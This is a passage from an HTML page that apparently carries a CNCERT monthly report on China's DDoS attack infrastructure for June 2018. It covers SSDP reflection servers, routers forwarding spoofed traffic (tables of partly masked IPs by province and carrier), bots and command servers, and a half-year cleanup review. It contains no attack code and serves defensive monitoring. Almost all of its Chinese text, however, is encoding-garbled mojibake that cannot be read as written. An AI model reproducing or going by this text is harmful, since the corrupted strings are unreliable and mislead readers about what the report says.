3102<p style="text-align: justify;">近两月被æŒç»åˆ©ç”¨å‘起攻击的SSDPåå°„æœåС噍ä¸ï¼Œå…±è®¡423,548个在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸297,805个ä½äºŽå¢ƒå†…,125,743个ä½äºŽå¢ƒå¤–。近两月æŒç»æ´»è·ƒçš„SSDPåå°„æœåŠ¡å™¨æŒ‰çœä»½ç»Ÿè®¡ï¼Œè¾½å®çœå 的比例最大,å 36.1%ï¼Œå…¶æ¬¡æ˜¯å‰æž—çœã€å¹¿ä¸œçœå’Œæ²³åŒ—çœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œè”通å 的比例最大,å 65.7%,电信å 29.3%,移动å 4.4%,如图14所示。 </p>
3103</p>
3104<p><img alt="近两月被æŒç»åˆ©ç”¨å‘起攻击的SSDPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140954354.png!small" width="690" height="312.63157894736844"> </p>
3105</p>
3106<p style="text-align: center;">图14 近两月被æŒç»åˆ©ç”¨å‘起攻击的SSDPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ</p>
3107</p>
3108<p style="text-align: justify;"><b>(4)å‘èµ·ä¼ªé€ æµé‡çš„è·¯ç”±å™¨åˆ†æž </b> </p>
3109</p>
3110<p style="text-align: justify;">A. è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</p>
3111</p>
3112<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6æœˆï¼Œé€šè¿‡è·¨åŸŸä¼ªé€ æµé‡å‘起攻击的æµé‡æ¥æºäºŽ193ä¸ªè·¯ç”±å™¨ã€‚æ ¹æ®å‚与攻击事件的数é‡ç»Ÿè®¡ï¼Œå½’属于新疆维å¾å°”自治区移动的路由器(221.X.X.5ã€221.X.X.9)和北京电信的路由器(219.X.X.70)å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼Œå¦‚表8所示。</p>
3113</p>
3114<p style="text-align: center;">表8 本月å‚ä¸Žæ”»å‡»æœ€å¤šçš„è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨TOP25 </p>
3115</p>
3116<table>
3117<colgroup>
3118<col>
3119<col>
3120<col> </colgroup>
3121<thead>
3122<tr>
3123<th>è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</th>
3124<th>归属çœä»½</th>
3125<th>归属è¿è¥å•†</th>
3126</tr>
3127</thead>
3128<tbody>
3129<tr>
3130<td>221.X.X.5</td>
3131<td>新疆维å¾å°”æ—自治区</td>
3132<td>移动</td>
3133</tr>
3134<tr>
3135<td>221.X.X.9</td>
3136<td>新疆维å¾å°”æ—自治区</td>
3137<td>移动</td>
3138</tr>
3139<tr>
3140<td>219.X.X.70</td>
3141<td>北京市</td>
3142<td>电信</td>
3143</tr>
3144<tr>
3145<td>221.X.X.6</td>
3146<td>新疆维å¾å°”æ—自治区</td>
3147<td>移动</td>
3148</tr>
3149<tr>
3150<td>118.X.X.169</td>
3151<td>å››å·çœ</td>
3152<td>电信</td>
3153</tr>
3154<tr>
3155<td>113.X.X.253</td>
3156<td>湖北çœ</td>
3157<td>è”通</td>
3158</tr>
3159<tr>
3160<td>113.X.X.252</td>
3161<td>湖北çœ</td>
3162<td>è”通</td>
3163</tr>
3164<tr>
3165<td>61.X.X.25</td>
3166<td>浙江çœ</td>
3167<td>电信</td>
3168</tr>
3169<tr>
3170<td>219.X.X.30</td>
3171<td>北京市</td>
3172<td>电信</td>
3173</tr>
3174<tr>
3175<td>211.X.X.48</td>
3176<td>云å—çœ</td>
3177<td>移动</td>
3178</tr>
3179<tr>
3180<td>211.X.X.43</td>
3181<td>贵州çœ</td>
3182<td>移动</td>
3183</tr>
3184<tr>
3185<td>222.X.X.200</td>
3186<td>山东çœ</td>
3187<td>电信</td>
3188</tr>
3189<tr>
3190<td>218.X.X.101</td>
3191<td>内蒙å¤è‡ªæ²»åŒº</td>
3192<td>è”通</td>
3193</tr>
3194<tr>
3195<td>118.X.X.168</td>
3196<td>å››å·çœ</td>
3197<td>电信</td>
3198</tr>
3199<tr>
3200<td>222.X.X.201</td>
3201<td>山东çœ</td>
3202<td>电信</td>
3203</tr>
3204<tr>
3205<td>220.X.X.235</td>
3206<td>浙江çœ</td>
3207<td>电信</td>
3208</tr>
3209<tr>
3210<td>221.X.X.254</td>
3211<td>江è‹çœ</td>
3212<td>è”通</td>
3213</tr>
3214<tr>
3215<td>221.X.X.246</td>
3216<td>江è‹çœ</td>
3217<td>è”通</td>
3218</tr>
3219<tr>
3220<td>220.X.X.236</td>
3221<td>浙江çœ</td>
3222<td>电信</td>
3223</tr>
3224<tr>
3225<td>124.X.X.250</td>
3226<td>上海市</td>
3227<td>电信</td>
3228</tr>
3229<tr>
3230<td>202.X.X.223</td>
3231<td>河北çœ</td>
3232<td>è”通</td>
3233</tr>
3234<tr>
3235<td>202.X.X.224</td>
3236<td>河北çœ</td>
3237<td>è”通</td>
3238</tr>
3239<tr>
3240<td>61.X.X.184</td>
3241<td>剿ž—çœ</td>
3242<td>è”通</td>
3243</tr>
3244<tr>
3245<td>61.X.X.185</td>
3246<td>剿ž—çœ</td>
3247<td>è”通</td>
3248</tr>
3249<tr>
3250<td>219.X.X.144</td>
3251<td>北京市</td>
3252<td>电信</td>
3253</tr>
3254</tbody>
3255</table>
3256<p style="text-align: justify;">è·¨åŸŸä¼ªé€ æµé‡æ¶‰åŠè·¯ç”±å™¨æŒ‰çœä»½åˆ†å¸ƒç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,å 12.4%,其次是江è‹çœå’Œå±±ä¸œçœï¼›æŒ‰è·¯ç”±å™¨æ‰€å±žè¿è¥å•†ç»Ÿè®¡ï¼Œè”通å 的比例最大,å 37.3%ï¼Œç”µä¿¡å æ¯”31.6%ï¼Œç§»åŠ¨å æ¯”31.1%,如图15所示。</p>
3257<p><img alt="è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141125783.png!small" width="690" height="280.1897533206831"> </p>
3258</p>
3259<p style="text-align: center;">图15 è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3260</p>
3261<p style="text-align: justify;">B. æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</p>
3262</p>
3263<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6æœˆï¼Œé€šè¿‡æœ¬åœ°ä¼ªé€ æµé‡å‘起攻击的æµé‡æ¥æºäºŽ395ä¸ªè·¯ç”±å™¨ã€‚æ ¹æ®å‚与攻击事件的数é‡ç»Ÿè®¡ï¼Œå½’属于山西çœç”µä¿¡çš„路由器(219.X.X.2ã€219.X.X.10)å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼Œå…¶æ¬¡æ˜¯å½’属于山东çœç”µä¿¡çš„路由器(150.X.X.1ã€150.X.X.2),如表9所示。</p>
3264</p>
3265<p style="text-align: center;">表9 本月å‚ä¸Žæ”»å‡»æœ€å¤šçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨TOP25 </p>
3266</p>
3267<table>
3268<colgroup>
3269<col>
3270<col>
3271<col> </colgroup>
3272<thead>
3273<tr>
3274<th>æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</th>
3275<th>归属çœä»½</th>
3276<th>归属è¿è¥å•†</th>
3277</tr>
3278</thead>
3279<tbody>
3280<tr>
3281<td>219.X.X.2</td>
3282<td>山西çœ</td>
3283<td>电信</td>
3284</tr>
3285<tr>
3286<td>219.X.X.10</td>
3287<td>山西çœ</td>
3288<td>电信</td>
3289</tr>
3290<tr>
3291<td>150.X.X.1</td>
3292<td>山东çœ</td>
3293<td>电信</td>
3294</tr>
3295<tr>
3296<td>150.X.X.2</td>
3297<td>山东çœ</td>
3298<td>电信</td>
3299</tr>
3300<tr>
3301<td>118.X.X.169</td>
3302<td>å››å·çœ</td>
3303<td>电信</td>
3304</tr>
3305<tr>
3306<td>218.X.X.177</td>
3307<td>贵州çœ</td>
3308<td>移动</td>
3309</tr>
3310<tr>
3311<td>218.X.X.176</td>
3312<td>贵州çœ</td>
3313<td>移动</td>
3314</tr>
3315<tr>
3316<td>202.X.X.141</td>
3317<td>山西çœ</td>
3318<td>电信</td>
3319</tr>
3320<tr>
3321<td>220.X.X.253</td>
3322<td>北京市</td>
3323<td>电信</td>
3324</tr>
3325<tr>
3326<td>220.X.X.243</td>
3327<td>北京市</td>
3328<td>电信</td>
3329</tr>
3330<tr>
3331<td>202.X.X.143</td>
3332<td>山西çœ</td>
3333<td>电信</td>
3334</tr>
3335<tr>
3336<td>220.X.X.127</td>
3337<td>浙江çœ</td>
3338<td>电信</td>
3339</tr>
3340<tr>
3341<td>211.X.X.20</td>
3342<td>贵州çœ</td>
3343<td>移动</td>
3344</tr>
3345<tr>
3346<td>211.X.X.19</td>
3347<td>贵州çœ</td>
3348<td>移动</td>
3349</tr>
3350<tr>
3351<td>222.X.X.122</td>
3352<td>ç¦å»ºçœ</td>
3353<td>电信</td>
3354</tr>
3355<tr>
3356<td>222.X.X.121</td>
3357<td>ç¦å»ºçœ</td>
3358<td>电信</td>
3359</tr>
3360<tr>
3361<td>220.X.X.126</td>
3362<td>浙江çœ</td>
3363<td>电信</td>
3364</tr>
3365<tr>
3366<td>123.X.X.2</td>
3367<td>内蒙å¤è‡ªæ²»åŒº</td>
3368<td>电信</td>
3369</tr>
3370<tr>
3371<td>218.X.X.130</td>
3372<td>å››å·çœ</td>
3373<td>电信</td>
3374</tr>
3375<tr>
3376<td>202.X.X.167</td>
3377<td>山东çœ</td>
3378<td>电信</td>
3379</tr>
3380<tr>
3381<td>218.X.X.162</td>
3382<td>å››å·çœ</td>
3383<td>电信</td>
3384</tr>
3385<tr>
3386<td>221.X.X.233</td>
3387<td>å®å¤å›žæ—自治区</td>
3388<td>è”通</td>
3389</tr>
3390<tr>
3391<td>112.X.X.2</td>
3392<td>云å—çœ</td>
3393<td>电信</td>
3394</tr>
3395<tr>
3396<td>61.X.X.1</td>
3397<td>å››å·çœ</td>
3398<td>电信</td>
3399</tr>
3400<tr>
3401<td>211.X.X.10</td>
3402<td>贵州çœ</td>
3403<td>移动</td>
3404</tr>
3405</tbody>
3406</table>
3407<p style="text-align: justify;">æœ¬æœˆæœ¬åœ°ä¼ªé€ æµé‡æ¶‰åŠè·¯ç”±å™¨æŒ‰çœä»½åˆ†å¸ƒï¼Œæ±Ÿè‹çœå 的比例最大,å 11.1%,其次是山西çœã€é™•西çœå’Œå¹¿ä¸œçœï¼›æŒ‰è·¯ç”±å™¨æ‰€å±žè¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 45.3%ï¼Œç§»åŠ¨å æ¯”30.9%,è”é€šå æ¯”23.0%,如图16所示。</p>
3408<p><img alt="æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141273286.png!small" width="690" height="293.5282258064516"> </p>
3409</p>
3410<p style="text-align: center;">图16 æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3411</p>
3412<h2>è¿‘åŠå¹´æˆ‘å›½å¢ƒå†…æ”»å‡»èµ„æºæ´»è·ƒåŠæ²»ç†æƒ…况分æž</h2>
3413</p>
3414<p style="text-align: justify;">2018年以æ¥ï¼ŒCNCERT组织å„çœåˆ†ä¸å¿ƒï¼Œè”åˆå„地è¿è¥å•†ã€äº‘æœåС商ç‰å¯¹æˆ‘国境内的攻击资æºè¿›è¡Œäº†ä¸“项治ç†ã€‚ç»è¿‡åŠå¹´ä»¥æ¥çš„èµ„æºæ²»ç†å·¥ä½œï¼Œç»¼åˆå¢ƒå†…å„类攻击资æºçš„å˜åŒ–趋势,我们分æžå‘现控制端ã€è‚‰é¸¡ç‰èµ„æºçš„æœˆæ´»è·ƒæ•°é‡è¾ƒ2017年有了较明显的下é™è¶‹åŠ¿ï¼›æŽ§åˆ¶ç«¯ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ç‰èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼æœ‰ä¸€å®šç¨‹åº¦çš„上å‡ï¼Œæ„味ç€èµ„æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„资æºç¨³å®šæ€§é™ä½Žï¼›åå°„æœåŠ¡å™¨èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼ï¼Œæ–°å¢žçއä¸å˜ã€æ¶ˆäº¡çŽ‡å‘ˆçŽ°ä¸€å®šç¨‹åº¦çš„ä¸‹é™ï¼Œæ„味ç€å¯åˆ©ç”¨çš„èµ„æºæ•°é‡é€æ¥å‡å°‘。资æºçš„具体å˜åŒ–趋势如下:</p>
3415</p>
3416<h3>1. æˆ‘å›½å¢ƒå†…æ”»å‡»èµ„æºæ´»è·ƒæƒ…况分æž</h3>
3417</p>
3418<p><b>(1) 控制端资æº</b></p>
3419</p>
3420<p>近三个月以æ¥ï¼Œåˆ©ç”¨è‚‰é¸¡å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯å¹³å‡æ¯æœˆæ•°é‡ä¸º40个,较2017年平凿¯æœˆæ•°é‡ç›¸æ¯”下é™44%ã€‚å¢ƒå†…æŽ§åˆ¶ç«¯èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º81%,消亡率为83%,与2017年平凿¯æœˆ70%的新增率和71%的消亡率相比,资æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„稳定性é™ä½Žã€‚å…¶ä¸ï¼Œåªæœ‰1个ä½äºŽä¸Šæµ·çš„境内控制端(182.X.X.227)在近三个月甚至åŠå¹´å†…æŒç»æ´»è·ƒã€‚</p>
3421</p>
3422<p style="text-align: justify;"><b>(2) è‚‰é¸¡èµ„æº </b> </p>
3423</p>
3424<p style="text-align: justify;">近三个月以æ¥ï¼Œè¢«åˆ©ç”¨å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…è‚‰é¸¡å¹³å‡æ¯æœˆæ•°é‡ä¸º103,970个,与2017年平凿¯æœˆæ•°é‡ç›¸æ¯”下é™è¿‘50%ã€‚å¢ƒå†…è‚‰é¸¡èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º87%,消亡率为88%,与2017年平凿¯æœˆçš„æ–°å¢žçŽ‡å’Œçš„æ¶ˆäº¡çŽ‡ç›¸æ¯”æ— æ˜Žæ˜¾å˜åŒ–ï¼›å˜åœ¨3,209个肉鸡在近三个月内æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图17所示,主è¦ä½äºŽæµ™æ±Ÿçœã€å¹¿ä¸œçœå’Œå±±è¥¿çœï¼Œç”µä¿¡å 的比例最大。其ä¸ï¼Œå˜åœ¨78ä¸ªå¢ƒå†…è‚‰é¸¡åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月。</p>
3425<p><img alt="近三个月内æŒç»æ´»è·ƒçš„å¢ƒå†…è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141564676.png!small" width="690" height="356.1290322580645"> </p>
3426</p>
3427<p style="text-align: center;">图17 近三个月内æŒç»æ´»è·ƒçš„å¢ƒå†…è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3428</p>
3429<p style="text-align: justify;"><b>(3) åå°„æœåŠ¡å™¨èµ„æº</b></p>
3430</p>
3431<p style="text-align: justify;">近三个月以æ¥ï¼Œåˆ©ç”¨å¢ƒå†…æœåС噍ã€ä¸»æœºç‰è®¾æ–½å‘èµ·DDoSå射攻击的åå°„æœåС噍平凿•°é‡ä¸º2,812,943个。境内åå°„æœåŠ¡å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º81%,消亡率为84%,与2017年平凿¯æœˆçš„85%新增率和的71%消亡率相比,消亡率呈现增快趋势;å˜åœ¨75,777个åå°„æœåŠ¡å™¨åœ¨è¿‘ä¸‰ä¸ªæœˆå†…æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图18所示,主è¦ä½äºŽè¾½å®çœã€å¹¿ä¸œçœå’Œå‰æž—çœï¼Œè”通å 的比例最大。其ä¸ï¼Œå˜åœ¨85个境内åå°„æœåŠ¡å™¨åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月。</p>
3432</p>
3433<p><img alt="近三个月内æŒç»æ´»è·ƒçš„åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†æž" src="http://image.3001.net/images/20180724/15324141709042.png!small" width="690" height="333.2934131736527"> </p>
3434</p>
3435<p style="text-align: center;">图18 近三个月内æŒç»æ´»è·ƒçš„åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†æž</p>
3436</p>
3437<p style="text-align: justify;"><b>(4) è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3438</p>
3439<p style="text-align: justify;">近三个月以æ¥ï¼Œè¢«åˆ©ç”¨è½¬å‘è·¨åŸŸä¼ªé€ æ”»å‡»æµé‡çš„境内è¿è¥å•†è·¯ç”±å™¨å¹³å‡æ•°é‡ä¸º177ä¸ªï¼›å¢ƒå†…è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º33%,消亡率为29%,与2017年平凿¯æœˆ22%的新增率和20%的消亡率相比,资æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„稳定性é™ä½Žï¼›å˜åœ¨72ä¸ªè·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨åœ¨è¿‘三个月内æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图19所示,主è¦ä½äºŽå¹¿ä¸œçœã€ä¸Šæµ·å¸‚和四å·çœï¼Œç”µä¿¡æ‰€å 的比例最大。其ä¸ï¼Œå˜åœ¨9ä¸ªåŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月,详细信æ¯å¦‚表10所示。</p>
3440</p>
3441<p><img alt="近三个月内æŒç»æ´»è·ƒçš„è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141835411.png!small" width="690" height="294.75728155339806"></p>
3442<p style="text-align: center;">图19 近三个月内æŒç»æ´»è·ƒçš„è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3443</p>
3444<p style="text-align: center;">表10 è¿‘ä¸¤å¹´åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月的跨域æµé‡æ¥æºè·¯ç”±å™¨ä¿¡æ¯</p>
3445</p>
3446<table>
3447<colgroup>
3448<col>
3449<col>
3450<col>
3451<col> </colgroup>
3452<thead>
3453<tr>
3454<th>è·¨åŸŸä¼ªé€ æ¥æºè·¯ç”±å™¨</th>
3455<th>åŽ†å²æ´»è·ƒæœˆä»½</th>
3456<th>所属çœä»½</th>
3457<th>所属è¿è¥å•†</th>
3458</tr>
3459</thead>
3460<tbody>
3461<tr>
3462<td>61.X.X.25</td>
3463<td>13</td>
3464<td>浙江</td>
3465<td>电信</td>
3466</tr>
3467<tr>
3468<td>219.X.X.30</td>
3469<td>14</td>
3470<td>北京</td>
3471<td>电信</td>
3472</tr>
3473<tr>
3474<td>218.X.X.254</td>
3475<td>13</td>
3476<td>山东</td>
3477<td>è”通</td>
3478</tr>
3479<tr>
3480<td>180.X.X.2</td>
3481<td>13</td>
3482<td>北京</td>
3483<td>电信</td>
3484</tr>
3485<tr>
3486<td>218.X.X.254</td>
3487<td>13</td>
3488<td>山东</td>
3489<td>è”通</td>
3490</tr>
3491<tr>
3492<td>221.X.X.2</td>
3493<td>14</td>
3494<td>天津</td>
3495<td>电信</td>
3496</tr>
3497<tr>
3498<td>221.X.X.1</td>
3499<td>14</td>
3500<td>天津</td>
3501<td>电信</td>
3502</tr>
3503<tr>
3504<td>221.X.X.254</td>
3505<td>14</td>
3506<td>广东</td>
3507<td>è”通</td>
3508</tr>
3509<tr>
3510<td>219.X.X.70</td>
3511<td>14</td>
3512<td>北京</td>
3513<td>电信</td>
3514</tr>
3515</tbody>
3516</table>
3517<p style="text-align: justify;"><b>(5) æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3518</p>
3519<p style="text-align: justify;">近三个月以æ¥ï¼Œè¢«åˆ©ç”¨è½¬å‘ä¼ªé€ æœ¬åŒºåŸŸæ”»å‡»æµé‡çš„境内è¿è¥å•†è·¯ç”±å™¨å¹³å‡æ•°é‡ä¸º440ä¸ªï¼›å¢ƒå†…æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º23%,消亡率为29%,与2017年平凿¯æœˆ14%的新增率和13%的消亡率相比,资æºå˜åŒ–é€Ÿåº¦æœ‰è¾ƒæ˜Žæ˜¾çš„åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„稳定性é™ä½Žï¼›å˜åœ¨174ä¸ªæœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨åœ¨è¿‘三个月内æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图20所示,主è¦ä½äºŽæ±Ÿè‹çœã€æµ™æ±Ÿçœå’Œå¹¿ä¸œçœï¼Œç”µä¿¡å 的比例最大。其ä¸ï¼Œæœ‰20ä¸ªè·¯ç”±å™¨åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月,如表11所示。</p>
3520</p>
3521<p><img alt="近三个月内æŒç»æ´»è·ƒçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141976182.png!small" width="690" height="278.160469667319"> </p>
3522<p style="text-align: center;">图20 近三个月内æŒç»æ´»è·ƒçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3523</p>
3524<p style="text-align: center;">
3525</p>
3526<p style="text-align: center;">表11 è¿‘ä¸¤å¹´åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月的跨域æµé‡æ¥æºè·¯ç”±å™¨ä¿¡æ¯</p>
3527</p>
3528<table>
3529<colgroup>
3530<col>
3531<col>
3532<col>
3533<col> </colgroup>
3534<thead>
3535<tr>
3536<th>æœ¬åœ°ä¼ªé€ æ¥æºè·¯ç”±å™¨</th>
3537<th>åŽ†å²æ´»è·ƒæœˆåº¦</th>
3538<th>所属çœä»½</th>
3539<th>所属è¿è¥å•†</th>
3540</tr>
3541</thead>
3542<tbody>
3543<tr>
3544<td>124.X.X.1</td>
3545<td>14</td>
3546<td>山西</td>
3547<td>è”通</td>
3548</tr>
3549<tr>
3550<td>124.X.X.2</td>
3551<td>14</td>
3552<td>山西</td>
3553<td>è”通</td>
3554</tr>
3555<tr>
3556<td>218.X.X.101</td>
3557<td>13</td>
3558<td>河北</td>
3559<td>移动</td>
3560</tr>
3561<tr>
3562<td>220.X.X.243</td>
3563<td>13</td>
3564<td>北京</td>
3565<td>电信</td>
3566</tr>
3567<tr>
3568<td>202.X.X.159</td>
3569<td>13</td>
3570<td>江西</td>
3571<td>电信</td>
3572</tr>
3573<tr>
3574<td>202.X.X.155</td>
3575<td>13</td>
3576<td>ç¦å»º</td>
3577<td>电信</td>
3578</tr>
3579<tr>
3580<td>202.X.X.156</td>
3581<td>13</td>
3582<td>江西</td>
3583<td>电信</td>
3584</tr>
3585<tr>
3586<td>202.X.X.157</td>
3587<td>13</td>
3588<td>江西</td>
3589<td>电信</td>
3590</tr>
3591<tr>
3592<td>202.X.X.158</td>
3593<td>13</td>
3594<td>江西</td>
3595<td>电信</td>
3596</tr>
3597<tr>
3598<td>202.X.X.151</td>
3599<td>13</td>
3600<td>ç¦å»º</td>
3601<td>电信</td>
3602</tr>
3603<tr>
3604<td>202.X.X.154</td>
3605<td>13</td>
3606<td>ç¦å»º</td>
3607<td>电信</td>
3608</tr>
3609<tr>
3610<td>202.X.X.150</td>
3611<td>13</td>
3612<td>ç¦å»º</td>
3613<td>电信</td>
3614</tr>
3615<tr>
3616<td>220.X.X.253</td>
3617<td>13</td>
3618<td>北京</td>
3619<td>电信</td>
3620</tr>
3621<tr>
3622<td>222.X.X.122</td>
3623<td>13</td>
3624<td>ç¦å»º</td>
3625<td>电信</td>
3626</tr>
3627<tr>
3628<td>222.X.X.121</td>
3629<td>13</td>
3630<td>ç¦å»º</td>
3631<td>电信</td>
3632</tr>
3633<tr>
3634<td>61.X.X.26</td>
3635<td>13</td>
3636<td>浙江</td>
3637<td>电信</td>
3638</tr>
3639<tr>
3640<td>219.X.X.1</td>
3641<td>13</td>
3642<td>山西</td>
3643<td>电信</td>
3644</tr>
3645<tr>
3646<td>61.X.X.8</td>
3647<td>13</td>
3648<td>浙江</td>
3649<td>电信</td>
3650</tr>
3651<tr>
3652<td>61.X.X.4</td>
3653<td>13</td>
3654<td>浙江</td>
3655<td>电信</td>
3656</tr>
3657<tr>
3658<td>220.X.X.59</td>
3659<td>13</td>
3660<td>江西</td>
3661<td>电信</td>
3662</tr>
3663</tbody>
3664</table>
3665<h3>2. è¿‘åŠå¹´å„çœæ²»ç†æƒ…况分æž</h3>
3666</p>
3667<p style="text-align: justify;">è¿‘åŠå¹´æ¥ï¼Œå„çœä»½èµ„æºæ•°é‡æŽ’åå˜åŒ–情况如图21至图25所示,图ä¸çºµè½´ä¸ºçœä»½ï¼Œæ¨ªè½´ä¸ºæŽ’å。红色的点表示å„çœæ”»å‡»æ•°é‡åœ¨æŸæœˆçš„æŽ’åæƒ…况,月份越临近,点越大;月份越久远,点越å°ã€‚例如,最å°çš„点代表的是2017年全年å„çœèµ„æºæ•°é‡æŽ’å;最大的点代表的是2018å¹´6æœˆçš„èµ„æºæ•°é‡æŽ’å。</p>
3668</p>
3669<p style="text-align: justify;">图ä¸ä½“现的排åå˜åŒ–å˜åœ¨ä»¥ä¸‹æƒ…况:(1)红点如从左至å³ç”±å°å˜å¤§ï¼Œåˆ™è¡¨æ˜Žèµ„æºæŽ’åç›¸è¾ƒå¥½è½¬ï¼Œæ²»ç†æ•ˆæžœè¾ƒæ˜Žæ˜¾ï¼›ï¼ˆ2)红点从左至å³ç”±å¤§å˜å°ï¼Œè¡¨æ˜Žèµ„æºæŽ’åç›¸è¾ƒæ— å¥½è½¬æˆ–æ¶åŒ–;(3)红点æŒç»ä½äºŽå·¦ä¾§ï¼Œè¡¨æ˜Žèµ„æºæ•°é‡æŽ’å一直ä½äºŽå‰åˆ—;(4)红点æŒç»ä½äºŽå³ä¾§ï¼Œè¡¨æ˜Žèµ„æºæ•°é‡æŽ’在åŽéƒ¨ï¼›ï¼ˆ5ï¼‰å›¾ä¸æœªå‡ºçŽ°çš„çœä»½ï¼Œè¡¨æ˜Ž2017å¹´ä»¥æ¥æœªåœ¨è¯¥çœå‘现过æ¤ç±»æ´»è·ƒæ”»å‡»èµ„æºã€‚</p>
3670</p>
3671<p style="text-align: justify;"><b>(1) 控制端资æº</b></p>
3672</p>
